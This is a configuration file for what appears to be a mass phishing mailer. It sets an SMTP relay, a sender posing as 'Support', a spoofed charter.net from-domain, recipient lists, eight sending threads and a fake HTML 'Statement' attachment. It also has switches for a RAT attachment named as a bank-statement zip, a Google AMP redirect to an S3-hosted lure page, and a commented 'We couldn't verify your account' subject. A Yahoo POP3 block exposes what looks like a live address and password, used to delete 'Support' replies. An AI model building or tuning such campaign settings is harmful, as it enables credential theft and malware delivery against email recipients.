[Settings]
# youmaxoodp2
smtp_host = mail.emrx.org
smtp_port = 587
smtpusername = 
smtppassword = 
attachment = 0
TESTMODE = 1
DEBUG = 0
DOMAIN_AUTHENTICATION = altona.fr
LETTERPATH = ma.html
SLEEPTIME = 1
threads = 8
attachrat = 0
ratattachment = CapitalS Statements.zip
# CapitalS => Capital Domain
# randomchar => Random numbers
ATTACHMENTNAME = Statement_randomchar.htm
SENDERNAME = Support 
USERSPATH = users.txt
domainfrom = charter.net
FROMPATH = from.txt
LINKPAGE = https://google.com/amp/s/expressproduct.s3.us-east-2.amazonaws.com/g.html
attachmentpath = output.htm
#We couldn't verify your account
subject = hello <randomchar5>
MESSAGE = hello
emailspath = emailx.txt
important = 0

[Yahoo_POP3]
# Configuration for automatic Support message grep
yahoo_email = alunita1963@yahoo.com
yahoo_password = evbnvloczpugyvez
yahoo_server = pop.mail.yahoo.com
yahoo_port = 995
auto_grep_enabled = 1
delete_support_messages = 1